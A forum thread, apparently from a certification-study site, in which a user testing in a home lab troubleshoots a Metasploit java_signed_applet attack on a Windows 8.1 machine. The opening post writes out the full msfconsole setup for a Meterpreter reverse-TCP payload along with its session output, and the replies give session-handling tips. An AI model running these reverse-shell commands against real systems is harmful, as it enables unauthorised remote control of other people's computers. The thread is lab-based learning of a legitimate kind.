Exploit HELP!!!!!!

I am testing the java signed exploit on windows systems adn I cant get part an issue I am having:

I can get into the box, but meterpreter does not open and the session closes?

I am using KALI linux and the box is Windows 8.1 pro (firewall/windows defender turned off/java security disabled)

Here is the setup:

msfconsole
search java signed
use exploit/multi/browser/java_signed_applet
set SRVHOST 192.168.43.136
set target 1
set LHOST 192.168.43.136
set payload windows/meterpreter/reverse_tcp
set URIPATH /
exploit
I then click on the run program on the target computer

[*] 192.168.43.116 java_signed_applet - Handling request
[*] Sending stage (769536 bytes) to 192.168.43.116
[*] Meterpreter session 1 opened (192.168.43.136:4444 -> 192.168.43.116:54424) at 2009-05-12 01:46:14 -0600

thats it? it times out and goes back to msf>

My IP is 192.168.43.136

As you can see the session is established but thats it, no meterpreter?

Any ideas?

Find more posts tagged with

SAVE $250 on Your Boot Camp — Use Code "EXAM26"

Exclusively for TechExams members for Infosec Boot Camps starting before April 30, 2026

View Boot Camps

Comments

impelse

What happen when you use a simple shell not meterpreter? Sometimes I discovered that the meterpreter doesn't work all the time.

philz1982

Is this on a local network? If so packet trace both sides, check out the handshake since you are using TCP. If the handshake doesn't complete then you have issues, potentially firewall blocking reversing TCP.

impelse

That's could be an option too. Last week in my lab I was trying to get a shell in php using metepreter, I got the connection and two seconds later the connection was lost.

Also if I am not wrong I think there is one shell base in java, maybe you get stable shell.

MrAgent

Have you tried doing sessions -l to see if a session is established? If if you see you listed then just simply just use the command sessions -i and the ID number of the session listed.

Edit:
Some more info on the sessions command
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/#sessions-command

DDStime

MrAgent wrote: »

Have you tried doing sessions -l to see if a session is established? If if you see you listed then just simply just use the command sessions -i and the ID number of the session listed.

Edit:
Some more info on the sessions command
https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/#sessions-command

BINGO!

Hahhaha I figured it out last night after about an hour of playing with firewalls, win defender and Java settings and finally reading about the specific exploit. I went through and couldn't believe that I overlooked it.

I used : sessions -i 1 after establishing 12 different sessions hahah.

Man, its amazing how you get so caught up in the technical side of things that you overlook the most simple solution first....

MrAgent

When I am trying to troubleshoot something that I can't figure out, I usually try and take a step back and look at the most basic things first.